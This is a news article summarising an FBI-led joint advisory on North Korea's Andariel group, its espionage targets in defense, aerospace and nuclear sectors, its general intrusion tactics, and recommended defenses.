The US Federal Bureau of Investigation (FBI), in collaboration with South Korea and the UK, has issued a cybersecurity advisory to raise awareness about cyber espionage activities linked to the Reconnaissance General Bureau (RGB) 3rd Bureau of the Democratic People’s Republic of Korea (DPRK).
The RGB 3rd Bureau, which is located in Pyongyang and Sinuiju, includes a DPRK state-sponsored cyber group publicly known as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa.
According to the FBI, the group primarily targets defense, aerospace, nuclear, and engineering entities worldwide to obtain sensitive and classified technical information and intellectual property to advance the DPRK’s military and nuclear programs and ambitions.
The FBI stated that the group and its cyber techniques continue to pose a threat to various industry sectors worldwide, including entities in their respective countries, as well as in Japan and India.
RGB’s 3rd Bureau actors finance their espionage activities by carrying out ransomware operations against US healthcare organizations.
Initial access
The actors gain initial access by exploiting web servers using known vulnerabilities in software, such as Log4j, to deploy a web shell and access sensitive information and applications for further exploitation.
The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential-stealing tools such as Mimikatz.
They deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration and then also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.
The FBI encouraged critical infrastructure organizations to promptly apply vulnerability patches, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections.
“While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations,” the FBI said.
Cyber espionage
The actors are currently targeting sensitive military information and intellectual property of defense, aerospace, nuclear, and engineering organizations. They also focus on the medical and energy industries to a lesser extent.
In the field of defense, the actors are seeking information on heavy and light tanks, self-propelled howitzers, light strike vehicles, ammunition supply vehicles, littoral combat ships, combatant craft, submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs).
Critical information regarding fighter aircraft, unmanned aerial vehicles (UAVs), missiles, missile defense systems, satellites, satellite communications, nano-satellite technology, surveillance radar, phased-array radar, and other radar systems is at risk in the aerospace industry.
The actors attempted to obtain nuclear information, such as details on uranium processing and enrichment, waste and storage of materials, nuclear power plants, government nuclear facilities, and research institutes.
Furthermore, the risk extends to shipbuilding, marine engineering, robot machinery, additive manufacturing, 3D printing, casting, fabrication, high-heat metal molding, rubber and plastic molding, machining processes, and technology.
The targeted information includes contract specifications, bills of materials, project details, design drawings, and engineering documents. This information has military and civilian applications, and it leads the authoring agencies to assess one of the group’s main responsibilities: meeting the collection requirements for Pyongyang’s nuclear and defense programs.
The FBI suggested implementing security measures based on threat actors’ activity to enhance an organization’s cybersecurity.
Most Popular
Comments / 0